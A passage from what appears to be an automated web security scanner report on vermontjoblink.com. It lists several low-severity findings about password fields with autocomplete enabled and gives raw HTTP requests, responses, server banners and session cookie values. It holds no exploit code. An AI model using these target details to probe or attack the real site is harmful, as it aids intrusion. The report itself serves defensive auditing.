PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Set-Cookie: TEST=1;path=/
Set-Cookie: SYSTRANLANGUAGE=en;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<object> <form action="https://www.vermontjoblink.com/ada/mn_login_fnc.cfm" method="post"> <label for="v_username">
...[SNIP]...
<br /> <input name="v_password" type="password" id="v_password" size="15" /> <br />
...[SNIP]...

15.41. https://www.vermontjoblink.com/ada/default.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<object> <form action="https://www.vermontjoblink.com/ada/mn_login_fnc.cfm" method="post"> <label for="v_username">
...[SNIP]...
<br /> <input name="v_password" type="password" id="v_password" size="15" /> <br />
...[SNIP]...

15.42. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:11:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="etp_newuser_fnc.cfm?securitysys=on&amp;FormID=728&amp;rand=937626" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="v_password" style="margin-top:0px;margin-bottom:0px;" value="" id="password" size="10" maxlength="20" onFocus="select(); " /><input type="hidden" name="v_password_ADAdefault" value="" />
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="v_passwordverify" style="margin-top:0px;margin-bottom:0px;" value="" id="verifypassword" size="10" maxlength="20" onFocus="select(); " /><input type="hidden" name="v_passwordVerify_ADAdefault" value="" />
...[SNIP]...

15.43. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:25:30 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 21:25:29'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="etp_newuser_fnc.cfm?securitysys=on&amp;FormID=4169&amp;rand=516426" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="v_password" style="margin-top:0px;margin-bottom:0px;" value="" id="password" size="10" maxlength="20" onFocus="select(); " /><input type="hidden" name="v_password_ADAdefault" value="" />
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="v_passwordverify" style="margin-top:0px;margin-bottom:0px;" value="" id="verifypassword" size="10" maxlength="20" onFocus="select(); " /><input type="hidden" name="v_passwordVerify_ADAdefault" value="" />
...[SNIP]...

15.44. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:50:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-30 08:49:59'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="https://www.vermontjoblink.com/ada/mn_registration_fnc.cfm?securitysys=on&amp;FormID=11524&amp;rand=170509" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="password" style="margin-top:0px;margin-bottom:0px;" value="" id="password" size="20" maxlength="20" onFocus="select(); document.getElementById('Help_help_5002').style.visibility='visible';" onBlur="document.getElementById('Help_help_5002').style.visibility='hidden';" /><input type="hidden" name="password_ADAdefault" value="" />
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="passwordverify" style="margin-top:0px;margin-bottom:0px;" value="" id="verifypassword" size="20" maxlength="20" onFocus="select(); " /><input type="hidden" name="passwordVerify_ADAdefault" value="" />
...[SNIP]...

15.45. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:25:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 21:25:33'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="https://www.vermontjoblink.com/ada/mn_registration_fnc.cfm?securitysys=on&amp;FormID=4183&amp;rand=194603" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="password" style="margin-top:0px;margin-bottom:0px;" value="" id="password" size="20" maxlength="20" onFocus="select(); document.getElementById('Help_help_5002').style.visibility='visible';" onBlur="document.getElementById('Help_help_5002').style.visibility='hidden';" /><input type="hidden" name="password_ADAdefault" value="" />
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="passwordverify" style="margin-top:0px;margin-bottom:0px;" value="" id="verifypassword" size="20" maxlength="20" onFocus="select(); " /><input type="hidden" name="passwordVerify_ADAdefault" value="" />
...[SNIP]...

15.46. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:11:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="https://www.vermontjoblink.com/ada/mn_registration_fnc.cfm?securitysys=on&amp;FormID=733&amp;rand=107169" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="password" style="margin-top:0px;margin-bottom:0px;" value="" id="password" size="20" maxlength="20" onFocus="select(); document.getElementById('Help_help_5002').style.visibility='visible';" onBlur="document.getElementById('Help_help_5002').style.visibility='hidden';" /><input type="hidden" name="password_ADAdefault" value="" />
...[SNIP]...
<td valign="top" style="padding:0px;"><input class="cfInput cfRequiredElement" type="password" name="passwordverify" style="margin-top:0px;margin-bottom:0px;" value="" id="verifypassword" size="20" maxlength="20" onFocus="select(); " /><input type="hidden" name="passwordVerify_ADAdefault" value="" />
...[SNIP]...

15.47. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="/ada/mn_login_fnc.cfm?securitysys=on&amp;FormID=205&amp;rand=427323" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<br /> <input name="v_password" type="password" id="v_password" size="25" /> <br />
...[SNIP]...

15.48. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
